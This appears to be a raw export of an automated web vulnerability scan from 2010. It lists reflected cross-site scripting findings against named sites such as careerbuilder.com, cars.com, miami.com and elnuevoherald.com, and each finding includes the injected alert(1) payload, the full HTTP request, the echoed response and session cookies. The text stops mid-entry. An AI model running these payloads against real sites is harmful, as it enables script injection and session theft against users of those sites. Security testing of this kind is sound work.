GET /rt.ic/Florida_Miami/?lr=cbcb_mh59826'-alert(1)-'b0e1b29c015&SiteID=cbcb_mh045 HTTP/1.1 Host: retail.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 196717 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=cb054ad5c25e4f7c8fe17a48f1dee91c-343071214-wc-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65028A8C4478E20C154059119D0921DD53C8E8B668187685AE991E973471DDFBE77BEACC4A7A1B8CD36; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:33 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:34 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR13 Date: Sun, 14 Nov 2010 22:33:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh59826'-alert(1)-'b0e1b29c015&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b023'-alert(1)-'384c97332ed was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sm.ic/Florida_Miami/?lr=cbcb_mh5b023'-alert(1)-'384c97332ed&SiteID=cbcb_mh046 HTTP/1.1 Host: sales-marketing.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 199874 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=1ada416b55864b70b364400fe1ec4bd2-343071233-wx-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65088C2B54C90EA381232F5A1B73A74E39F55234E2E04AEE9D9E243F37AEFDF837155E0C8F4E2A2701C; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:52 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:53 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR34 Date: Sun, 14 Nov 2010 22:33:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh5b023'-alert(1)-'384c97332ed&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71567"%20a%3db%2037dba5a01fa was submitted in the lr parameter. This input was echoed as 71567" a=b 37dba5a01fa in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sm.ic/Florida_Miami/?lr=cbcb_mh71567"%20a%3db%2037dba5a01fa&SiteID=cbcb_mh046 HTTP/1.1 Host: sales-marketing.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 199294 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=2dec5cb744574f9c9598166721519d59-343071203-wq-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650B7174C4F3D987D1FF16F084FF840B84E44E723C892C16C31E97843014090580DC1E4169D092792D0; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:23 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:23 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR27 Date: Sun, 14 Nov 2010 22:33:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the fields request parameter is copied into the HTML document as plain text between tags. The payload 91cc6<script>alert(1)</script>88b28ce8f1f was submitted in the fields parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search-bin/search.pl.cgi?product=movies&live_template=http%3A%2F%2Fmovies.miami.com%2Fsearch%2Fv-sr%2Findex.html&collection=ENDECA_INDEX&fields=91cc6<script>alert(1)</script>88b28ce8f1f&preview_template=http%3A%2F%2Fmovies-preview.miami.com%2Fsearch%2Fv-sr%2Findex.html&results_per_page=500&prop_expose_refs=0&sf_movies_showtime_dt=&sf_meta_domain=www.miamiherald.com&sort=movies_theater_geocode%2Cmovies_theater_name%2Cmovies_movie_title%2Cmovies_showtime_dt&prop_geo_radius=20&sf_movies_showtimes=&sf_movies_theater_geocode=Miami&op.x=24&op.y=9&op=Search HTTP/1.1 Host: search.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:34:43 GMT Server: Apache/1.3.41 Vary: Accept-Encoding Expires: Sat, 13 Nov 2010 22:34:43 GMT Mi-app-host: rsds009p Content-Type: text/html; charset=ISO-8859-1 X-Cache: MISS from search.miami.com Connection: close Content-Length: 518
<h1>Search Error</h1> <b>Could not retrieve Error Template.</b><br> Error template: <br> error_template not set.
<p> <b>Search Error(s)</b><br> NM::Search::SEI::Connection: ERROR: Unable to parse query string: [search SOLR for 91cc6<script>alert(1)</script>88b28ce8f1f where meta_domain = "www.miamiherald.com" and meta_product = "movies" and movies_theater_geocode = "Miami" order by movies_theater_geocode,movies_theater_name,movies_movie_title,movies_showtime_dt lim ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84964"><script>alert(1)</script>ffc48037882 was submitted in the REST URL parameter 2. This input was echoed as 84964\"><script>alert(1)</script>ffc48037882 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/Special+Sales+Bear+bear84964"><script>alert(1)</script>ffc48037882/ HTTP/1.1 Host: tlight2-niqwf.aacehardware.info Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:31:35 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 8176
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 9b547</title><script>alert(1)</script>a06a19bd24a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/Special+Sales+Bear+bear9b547</title><script>alert(1)</script>a06a19bd24a/ HTTP/1.1 Host: tlight2-niqwf.aacehardware.info Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:31:41 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 9499
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8d6e9<script>alert(1)</script>fc28cde05d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/Special+Sales+Bear+bear8d6e9<script>alert(1)</script>fc28cde05d5/ HTTP/1.1 Host: tlight2-niqwf.aacehardware.info Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:31:38 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 9716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65c6"><script>alert(1)</script>7d45de7dcc6 was submitted in the REST URL parameter 2. This input was echoed as c65c6\"><script>alert(1)</script>7d45de7dcc6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/c65c6"><script>alert(1)</script>7d45de7dcc6/ HTTP/1.1 Host: tlight2-niqwf.aacehardware.info Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:31:37 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 10925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9252"%20a%3db%2073cda56ab20 was submitted in the lr parameter. This input was echoed as c9252" a=b 73cda56ab20 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?lr=cbcb_mhc9252"%20a%3db%2073cda56ab20&sc_cmp2=JS_Nav_Home&ff=21 HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 51063 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=f7f36667ce184a8cb9e94fbce6247967-343071309-wm-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6500CE4E9C78743F3D9DE8DB5BEB7FE82A6B7F1F5141E4907F897CC6AB6A78A6DED0A396D7BB9DAA4DC; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:09 GMT; path=/; HttpOnly Set-Cookie: JDP=2; domain=.careerbuilder.com; path=/ X-Powered-By: ASP.NET X-PBY: BEAR23 Date: Sun, 14 Nov 2010 22:35:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the section request parameter is copied into the HTML document as plain text between tags. The payload e4373<script>alert(1)</script>19d07abf959 was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /go/advice/Section.jsp?channel=advice§ion=buye4373<script>alert(1)</script>19d07abf959&aff=herald HTTP/1.1 Host: www.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cars_persist=3896579244.20480.0000;
<H1>Error page exception</H1> <H4>The server cannot use the error page specified for your application to handle the Original Exception printed below. Please see the Error Page Exception below for a d ...[SNIP]... </B>/advice/includes/_xSectionIndex_buye4373<script>alert(1)</script>19d07abf959.jsp<BR> ...[SNIP]...
The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6a7"><a%20b%3dc>9b378c5b51d was submitted in the subject parameter. This input was echoed as ec6a7"><a b=c>9b378c5b51d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /go/advice/Story.jsp?section=fuel&subject=fuelListec6a7"><a%20b%3dc>9b378c5b51d&story=mpgClass&aff=herald HTTP/1.1 Host: www.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cars_persist=3896579244.20480.0000;
The value of the subject request parameter is copied into the HTML document as plain text between tags. The payload 1f8c3<a>11eb73411e3 was submitted in the subject parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /go/advice/Story.jsp?section=buy&subject=1f8c3<a>11eb73411e3&story=classResidual HTTP/1.1 Host: www.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;
2.209. http://www.cars.com/go/car-dealers/ck/Miami-FL/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cars.com
Path:
/go/car-dealers/ck/Miami-FL/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbc6"><script>alert(1)</script>db9daeb9116 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /go/car-dealers/ck/Miami-FL/?8cbc6"><script>alert(1)</script>db9daeb9116=1 HTTP/1.1 Host: www.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cars_persist=3896579244.20480.0000;
The value of the story request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd9a2"><a%20b%3dc>39b26a2aac5 was submitted in the story parameter. This input was echoed as dd9a2"><a b=c>39b26a2aac5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /go/crp/buyingGuides/Story.jsp?section=Sports&story=sportHot2011dd9a2"><a%20b%3dc>39b26a2aac5&subject=stories&year=New HTTP/1.1 Host: www.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;
The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177f8"><script>alert(1)</script>c46c53badf5 was submitted in the subject parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /go/crp/buyingGuides/Story.jsp?section=Sports&story=sportHot2011&subject=stories177f8"><script>alert(1)</script>c46c53badf5&year=New HTTP/1.1 Host: www.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;
The value of the specialsURL request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload javascript%3aalert(1)//f5fd4a94 was submitted in the specialsURL parameter. This input was echoed as javascript:alert(1)//f5fd4a94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /go/dealersearch/specials.jsp?specialsURL=javascript%3aalert(1)//f5fd4a94&apn=herald&aff=herald HTTP/1.1 Host: www.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cars_persist=3896579244.20480.0000;
The value of the makename request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a186d"><script>alert(1)</script>13aeb39e616 was submitted in the makename parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the modelname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b61"><script>alert(1)</script>d4b3fa8bb16 was submitted in the modelname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the my request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d0dd"><script>alert(1)</script>f402f124952 was submitted in the my parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f72c'%3balert(1)//6eca97bbb21 was submitted in the version parameter. This input was echoed as 9f72c';alert(1)//6eca97bbb21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reg-bin/int.cgi?mode=login&version=esp9f72c'%3balert(1)//6eca97bbb21 HTTP/1.1 Host: www.elnuevoherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/1.3.41 Vary: Accept-Encoding Mi-app-host: rdds008p Content-Type: text/html; charset=ISO-8859-1 Expires: Sun, 14 Nov 2010 22:39:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:39:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77533
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 765c4'%3balert(1)//a86bf71eac9 was submitted in the version parameter. This input was echoed as 765c4';alert(1)//a86bf71eac9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reg-bin/tint.cgi?mode=edit&version=newsletter765c4'%3balert(1)//a86bf71eac9 HTTP/1.1 Host: www.elnuevoherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/1.3.41 Mi-app-host: rdds017p Content-Type: text/html; charset=ISO-8859-1 Expires: Sun, 14 Nov 2010 22:39:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:39:36 GMT Content-Length: 32389 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
2.218. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mathias-bank.de
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91ba8"><script>alert(1)</script>9a5bd6d02c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91ba8\"><script>alert(1)</script>9a5bd6d02c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?91ba8"><script>alert(1)</script>9a5bd6d02c1=1 HTTP/1.1 Host: www.mathias-bank.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:40:39 GMT Server: Apache/2.2.8 (Ubuntu) X-Powered-By: PHP/5.2.4-2ubuntu5.12 X-Pingback: http://www.mathias-bank.de/xmlrpc.php Set-Cookie: bb2_screener_=1289774439+174.121.222.18; path=/ Set-Cookie: PHPSESSID=0f3d95ccecf9bde143451862e81a94c4; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54762
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <a href="/?91ba8\"><script>alert(1)</script>9a5bd6d02c1=1/lang-pref/en/"> ...[SNIP]...
2.219. http://www.miami.com/advanced-search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miami.com
Path:
/advanced-search
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b0f3"-alert(1)-"6571febded2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced-search?6b0f3"-alert(1)-"6571febded2=1 HTTP/1.1 Host: www.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK Server: Apache/1.3.37 Last-Modified: Sun, 14 Nov 2010 22:44:20 GMT Content-Type: text/html; charset=utf-8 Expires: Sun, 14 Nov 2010 22:44:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:44:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 112540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.220. http://www.miami.com/deals [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miami.com
Path:
/deals
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3581b"-alert(1)-"133c343be5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals?3581b"-alert(1)-"133c343be5e=1 HTTP/1.1 Host: www.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK Server: Apache/1.3.37 Last-Modified: Sun, 14 Nov 2010 22:44:21 GMT Content-Type: text/html; charset=utf-8 Expires: Sun, 14 Nov 2010 22:44:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:44:23 GMT Content-Length: 22144 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.221. http://www.miami.com/espanol [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miami.com
Path:
/espanol
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2adf"-alert(1)-"b1a172c4bed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /espanol?f2adf"-alert(1)-"b1a172c4bed=1 HTTP/1.1 Host: www.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK Server: Apache/1.3.37 Last-Modified: Sun, 14 Nov 2010 22:42:47 GMT Content-Type: text/html; charset=utf-8 Expires: Sun, 14 Nov 2010 22:42:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:42:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 71598
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.222. http://www.miami.com/galleries [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miami.com
Path:
/galleries
Issue detail
